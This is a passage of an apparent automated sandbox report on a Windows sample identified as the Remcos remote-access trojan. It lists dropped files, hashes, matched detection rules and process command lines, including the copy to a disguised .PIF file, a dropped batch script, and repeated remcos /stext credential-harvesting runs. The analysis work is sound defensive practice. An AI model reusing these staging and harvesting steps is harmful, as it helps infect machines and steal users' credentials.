                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE102E0_3_02BE102E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE04250_3_02BE0425
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE20180_3_02BE2018
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE04190_3_02BE0419
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE040D0_3_02BE040D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE00000_3_02BE0000
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE10450_3_02BE1045
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE09BC0_3_02BE09BC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE09B00_3_02BE09B0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE09A40_3_02BE09A4
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE11EA0_3_02BE11EA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE01DE0_3_02BE01DE
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE153D0_3_02BE153D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE0D380_3_02BE0D38
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE15310_3_02BE1531
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE29530_3_02BE2953
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_3_02BE15490_3_02BE1549
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156BE5580_2_156BE558
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B74E60_2_156B74E6
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B87700_2_156B8770
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B81680_2_156B8168
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156D41590_2_156D4159
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156C61F00_2_156C61F0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569F0FA0_2_1569F0FA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156BE0CC0_2_156BE0CC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156D332B0_2_156D332B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156A739D0_2_156A739D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156BE2FB0_2_156BE2FB
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B7D330_2_156B7D33
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B6FEA0_2_156B6FEA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15693FCA0_2_15693FCA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B5E5E0_2_156B5E5E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156A6E0E0_2_156A6E0E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156BDE9D0_2_156BDE9D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B39460_2_156B3946
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156CD9C90_2_156CD9C9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B78FE0_2_156B78FE
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569DB620_2_1569DB62
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156A7BAF0_2_156A7BAF
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156A7A460_2_156A7A46
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DE20C40_2_02DE20C4
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A671946_2_33A67194
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A5B5C16_2_33A5B5C1
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_02DF20C46_2_02DF20C4
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_02D620C48_2_02D620C4
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC74E68_2_14AC74E6
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14ACE5588_2_14ACE558
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14ACDE9D8_2_14ACDE9D
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC5E5E8_2_14AC5E5E
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC6FEA8_2_14AC6FEA
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC78FE8_2_14AC78FE
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14ACE0CC8_2_14ACE0CC
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AD61F08_2_14AD61F0
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC39468_2_14AC3946
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14ACE2FB8_2_14ACE2FB
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AE332B8_2_14AE332B
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AADB628_2_14AADB62
                      Source: Joe Sandbox ViewDropped File: C:\ProgramData\Remcos\remcos.exe E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Cmzcxhwn.PIF E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 14AC4E10 appears 54 times
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 02D66658 appears 32 times
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 02D64698 appears 156 times
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 02D64824 appears 628 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE44A0 appears 67 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 156B4770 appears 41 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 156B4E10 appears 54 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 15681E65 appears 35 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE4698 appears 247 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE6658 appears 32 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE4824 appears 882 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 15682093 appears 50 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DF7BE8 appears 45 times
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 02DF4698 appears 156 times
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 02DF6658 appears 32 times
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 02DF4824 appears 628 times
                      Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
                      Source: fu56fbrtn8.exeBinary or memory string: OriginalFilename vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1417481054.00000000150FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\Public\Libraries\CmzcxhwnO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@27/17@5/3
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15697952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_15697952
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AA7952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_14AA7952
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DE7F90 GetDiskFreeSpaceA,0_2_02DE7F90
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_1568F474
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DF6D84 CoCreateInstance,0_2_02DF6D84
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_1569B4A8
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_1569AC78
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeFile created: C:\Users\Public\Libraries\NullJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
                      Source: C:\ProgramData\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
                      Source: C:\ProgramData\Remcos\remcos.exeFile created: C:\Users\user\AppData\Local\Temp\bhv2770.tmpJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" "
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\ProgramData\Remcos\remcos.exeSystem information queried: HandleInformationJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000A.00000002.1530499601.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: remcos.exe, 00000009.00000002.1583187029.000000000270E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1631665563.000000000290E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: fu56fbrtn8.exeReversingLabs: Detection: 71%
                      Source: fu56fbrtn8.exeVirustotal: Detection: 73%
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeFile read: C:\Users\user\Desktop\fu56fbrtn8.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\fu56fbrtn8.exe "C:\Users\user\Desktop\fu56fbrtn8.exe"
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\fu56fbrtn8.exe C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\Public\Libraries\Cmzcxhwn.PIF "C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu"
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm"
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct"
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd"
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd"
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc"
                      Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: unknownProcess created: C:\Users\Public\Libraries\Cmzcxhwn.PIF "C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                      Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" "Jump to behavior
